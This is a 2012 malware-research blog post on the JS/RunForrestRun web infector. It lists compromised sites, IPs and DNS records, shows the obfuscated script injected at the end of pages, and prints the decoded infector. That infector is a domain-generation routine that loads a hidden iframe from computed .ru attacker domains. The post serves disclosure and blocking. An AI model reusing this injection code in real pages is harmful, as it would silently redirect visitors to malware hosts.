Wednesday, December 12, 2012

JS/RunForrestRun Infector ComeBack! Full Disclosure of Decoding URL, DGA Domain List, Registrar & DNS info. 

Today I will fully disclose the new PseudoRandom Domain / DGA of Infector 
JS/RunForrestRun we caught just soppted "come-back" in action.

It was started by hundreds infection found via spam emails linked url to:

//case -1-
h00p://www.osmanoguz.net/?p=422
h00p://www.osmanoguz.net/afferim-nan-sana-google.html
h00p://www.osmanoguz.net/artik-buralardayim-be-google.html
h00p://www.osmanoguz.net/ay-lav-yu-full-izle.html
h00p://www.osmanoguz.net/?p=1677
h00p://www.osmanoguz.net/2009un-en-kotu-oyunlari.html
h00p://www.osmanoguz.net/?p=2530
h00p://www.osmanoguz.net/?p=1821
h00p://www.osmanoguz.net/?p=1829
h00p://www.osmanoguz.net/?p=2477
 :

//case -2-
h00p://www.fotoajanda.com/?amp;album=140&id=3375&kategori=8&p=album
h00p://www.fotoajanda.com/?amp;album=66&id=1777&kategori=8&p=album
h00p://fotoajanda.com/?album=25
h00p://fotoajanda.com/?album=68
h00p://fotoajanda.com/?album=89
h00p://www.fotoajanda.com/?p=album&kategori=8&album=66&id=1777
h00p://www.fotoajanda.com/?p=album&kategori=8&album=140&id=3375
h00p://fotoajanda.com/?amp;album=3&id=22/&kategori=5&p=album
 :
We reported the osmanoguz.net right away and 
received cleanup response right away (thumbs up!)
But the infections using fotoajanda.com is still ACTIVE, UP & ALIVE, as -
per shown below in download PoC:

--13:58:37--  h00p://www.fotoajanda.com/?amp;album=66&id=1777&kategori=8&p=album
Resolving www.fotoajanda.com... 89.107.228.218
Connecting to www.fotoajanda.com|89.107.228.218|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25,838 (25K) [text/html]
13:58:39 (26.68 KB/s) - `./sample2.txt' saved [25838/25838]

--14:00:17--  h00p://fotoajanda.com/?album=25
Resolving fotoajanda.com... 89.107.228.218
Connecting to fotoajanda.com|89.107.228.218|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75,063 (73K) [text/html]
14:00:20 (45.54 KB/s) - `./sample3.txt' saved [75063/75063]
The web server info itself can be viewed by the below header request:

GET /?amp;album=140&id=3375&kategori=8&p=album HTTP/1.0
User-Agent: Get well soon Razor! I'm banging this infector for your health!
Accept: */*
Host: www.fotoajanda.com
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Dec 2012 04:43:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14
X-Powered-By: PleskLin
Content-Length: 25838
---response end---
200 OK
Length: 25,838 (25K) [text/html]
13:43:47 (26.19 KB/s) - `./sample' saved [25838/25838]
FINISHED --13:43:47--
Downloaded: 25,838 bytes in 1 files
And I guess it doesn't look clean IP/site for me.
At this point I looked the IP used in this infector domain -
which is 89.107.228.218 & surprised by many malicious domains queried -
via this IP as per below:

fotoajanda.com          A  89.107.228.218
armonipiyanodersi.com   A  89.107.228.218
www.radyopop.com        A  89.107.228.218
dorukuzgur.com          A  89.107.228.218
datants.com             A  89.107.228.218
thierrydiniz.com        A  89.107.228.218
ozge.net                A  89.107.228.218
www.ozge.net            A  89.107.228.218
demle.net               A  89.107.228.218
yayindayiz.biz          A  89.107.228.218
Some of the malicious domains using www subdomain as CNAME:

www.fotoajanda.com        CNAME  fotoajanda.com
www.armonipiyanodersi.com CNAME  armonipiyanodersi.com
www.dorukuzgur.com        CNAME  dorukuzgur.com
www.datants.com           CNAME  datants.com
www.yayindayiz.biz        CNAME  yayindayiz.biz
Same IP also being used to serve as DNS of malicious domains below:

ns1.trserver.com   A  89.107.228.218
ns.yayindayiz.biz  A  89.107.228.218
ns.dorukuzgur.com  A  89.107.228.218
In the downloaded data you'll see the injected malcode in -
every end of file as per snipped below:

<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114..
41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117..
34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,..
112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100..
 :
,53,52,93,59,118,61,34,101,118,97,34,59,125,105,1
14,61,83,116,114,105,110,103,59,122,61,40,40,101,
61,49,41,123,106,61,105,59,105,102,40,101,41,115,
7,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,
101,40,115,41,59,125,10));/*qhk6sa6g1c*/</script>
Which suggesting a format of obfuscated JS/RunForrestRun infector.

This obfs'ed code can be easily decoded to find the -
PseudoRandom Domain / DGA used by this infection as per below "hexed" code:

function nextRandomNumber(){
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if(test > 0){
        this.seed = test;
    } else {
        this.seed = test + this.M;
    } return (this.seed * this.oneOverM); }

function RandomNumberGenerator(unix){
    var d = new Date(unix*1000);
    var s = d.getHours() > 12 ? 1 : 0;
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this; }

function createRandomNumber(r, Min, Max){
    return Math.round((Max-Min) * r.next() + Min); }

function generatePseudoRandomString(unix, length, zone){
    var rand = new RandomNumberGenerator(unix);
    var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
    var str = '';
    for(var i = 0; i < length; i ++ ){
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }     return str + '.' + zone;}

setTimeout(function(){
    try{
        if(typeof iframeWasCreated == "undefined"){
            iframeWasCreated = true;
            var unix = Math.round(+new Date()/1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            ifrm = document.createElement("IFRAME"); 
            ifrm.setAttribute("src", "h00p://"+domainName+"/runforestrun?sid=botnet2"); 
            ifrm.style.width = "0px"; 
            ifrm.style.height = "0px"; 
            ifrm.style.visibility = "hidden"; 
            document.body.appendChild(ifrm);
        } }catch(e){} }, 500)
The code above will resulted in .RU domains difined by the date to formulate -
the url infector as per below structure:

http://****.ru/runforestrun?sid=botnet2

To crack or burps the domains used by this DGA is really easy :-)
Just change the setTimeout function()try's code into the below,
(by switching the year of 2012 & 2013)

//nextday.setFullYear(2012);
nextday.setFullYear(2013);
for (var yyy=0;yyy<13;yyy++)
  { nextday.setMonth(yyy);
for (var xxx= 1;xxx<33;xxx++)
     {     
      var unix = Math.round(nextday.setDate(xxx)/1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      document.write(xxx+" | "+domainName+ "  |  "+nextday+"\n"); }}
[IMPORTANT!]It will generated the domains aimed for this infection as per
listed in the pastebin here --->>[PASTEBIN] 


Are these really to-be-in-use malware domains?

To check this theory is simple.
If we can find that some of those domains are currently alive/registered,
then we can confirm this theory. For checking almost 400 domains will not -
be easy, that's why I uploaded the script/tools for this purpose in our -
Google Project Download Page here --->>[MMD Google Project]

The check result burped some domains currently UP & ALIVE, PoC↓

  :
bhigmqckbqhleqlo.ru,91.233.244.102,   //  Wed Nov 06 2013 15:50:08 GMT+0900
nsjosicxuhpidhlp.ru,91.233.244.102,   //  Thu Nov 07 2013 15:50:08 GMT+0900
  :

So are the urls download page for this infection up? 
If the url ia also up, it will not returning 404, then PoC is proved↓

--16:29:50--  h00p://bhigmqckbqhleqlo.ru/runforestrun?sid=botnet2
Resolving bhigmqckbqhleqlo.ru... 91.233.244.102
Connecting to bhigmqckbqhleqlo.ru|91.233.244.102|:80... connected.
HTTP request sent, awaiting response... 200 OK

--16:31:03--  h00p://nsjosicxuhpidhlp.ru/runforestrun?sid=botnet2
Resolving nsjosicxuhpidhlp.ru... 91.233.244.102
Connecting to nsjosicxuhpidhlp.ru|91.233.244.102|:80... connected.
HTTP request sent, awaiting response... 200 OK
↑Yep! both HOST & URL are UP and ALIVE! 
The current case's DGA domain infector list theory is proven!


What internet service /ISP/DNS are these badactors using?

So let's look it up...

bhigmqckbqhleqlo.ru.  3600  IN   SOA   dns1.webdrive.ru. admin.webdrive.ru. 1354094642 10800 3600 604800 3600
nsjosicxuhpidhlp.ru.  3600  IN   SOA   dns1.webdrive.ru. admin.webdrive.ru. 1354095124 10800 3600 604800 3600

bhigmqckbqhleqlo.ru.  3600  IN   A     91.233.244.102
bhigmqckbqhleqlo.ru.  3600  IN   NS    dns1.webdrive.ru.
bhigmqckbqhleqlo.ru.  3600  IN   NS    dns2.webdrive.ru.

nsjosicxuhpidhlp.ru.  3382  IN   A     91.233.244.102
nsjosicxuhpidhlp.ru.  3381  IN   NS    dns2.webdrive.ru.

dns1.webdrive.ru.     1991  IN   A     176.74.216.129
dns2.webdrive.ru.     1990  IN   A     159.253.133.210
So they are using WEBDRIVE.RU Registration for Domains, interesting!

Following this case, we will see OTHER malware domains in the same base IP:

donotwantyou787.ru   A  91.233.244.102
nsjosicxuhpidhlp.ru  A  91.233.244.102
Cool, we have more evil domains. It is indeed nteresting!

Furthermore, I doubt below DNS servers are used for ONLY good domains..
I bet there are EVIL DNS domains registered insides..

ns1.unitedplatform.com  A  176.74.216.129
ns1.daodomains.com      A  176.74.216.129
ns1.regway.com          A  176.74.216.129
n1.reg3.ru              A  176.74.216.129
ns1.nic-online.ru       A  176.74.216.129
dns1.webdrive.ru        A  176.74.216.129
ns1.getdomen.ru         A  176.74.216.129
ns1.yoursdomain.ru      A  176.74.216.129
dc1.nserver.ru          A  176.74.216.129
ns1.donax.ru            A  176.74.216.129

ns2.unitedplatform.com  A  159.253.133.210
ns2.daodomains.com      A  159.253.133.210
ns2.regway.com          A  159.253.133.210
n2.reg3.ru              A  159.253.133.210
ns2.nic-online.ru       A  159.253.133.210
dns2.webdrive.ru        A  159.253.133.210
ns2.getdomen.ru         A  159.253.133.210
dc2.nserver.ru          A  159.253.133.210
ns2.donax.ru            A  159.253.133.210


How bad the "Come-Back" infection of RunforrestRun?

Well, at least you'll find the below urls are infected by the same
obfuscated infector Javascript code:

// New Infection of PseudoRandom(DGA) RunForrestRun
// December 9th - 11th, 2012 
h00p://adamlambrechtfamily.info/user.php?PHPSESSID=e9of24684l4e69b2vi05f1r3k7&xoops_redirect=%2Fmodules%2Fmydownloads%2Fsubmit.php
h00p://adamlambrechtfamily.info/modules/content/index.php?id=0
h00p://adamlambrechtfamily.info/user.php?PHPSESSID=cfe8ukkcnp5tam437p81bl7s43&xoops_redirect=%2Fmodules%2Fmydownloads%2Fsubmit.php
h00p://www.janessafari.com/index.php/page/3/
h00p://www.janessafari.com/index.php/2009/11/
h00p://rouen-saint-valentin.com/
h00p://rouen-saint-valentin.com/index.php?menu_mnemo=menu_news
h00p://gopeyup.com/js/kategoriler.js
h00p://www.directoames.com/2009/06
h00p://www.nowax.co.uk/wordpress_nowax/wp-content/themes/3k2/js/slider.js.php
h00p://www.armonipiyanodersi.com/page/2
h00p://www.unic.ae/
h00p://www.armonipiyanodersi.com/2010/08/11
h00p://giaohoi.net/
h00p://alacatiayakkabi.com/iletisim.html
h00p://www.isaanmassage.com/thai-language-version/trackback
h00p://www.calendarigadget.it/wp-content/plugins/shutter-reloaded/shutter-reloaded.js
h00p://www.shivalikenterprise.com/js/jquery.min.js
h00p://www.pssrijan.com/js/marquee.js
h00p://www.economics4development.com/economic_development_theories.htm
h00p://www.directoames.com/2010/12
h00p://www.jasonslog.com/
h00p://allmovingboxes.com/index.php?cpath=23
 :
 :
and many more before 9th of Dec, 2012.
*) The infection reports were sent..


The moral of this post is...


Friends, you will do a very good deed to our internet service if you just
BLOCK every Domains, IP Addresses & DNS info reported in this post.
We took effort to proof this theory, through some rechecks before exposal.

#MalwareMustDie

Posted by unixfreaxjp at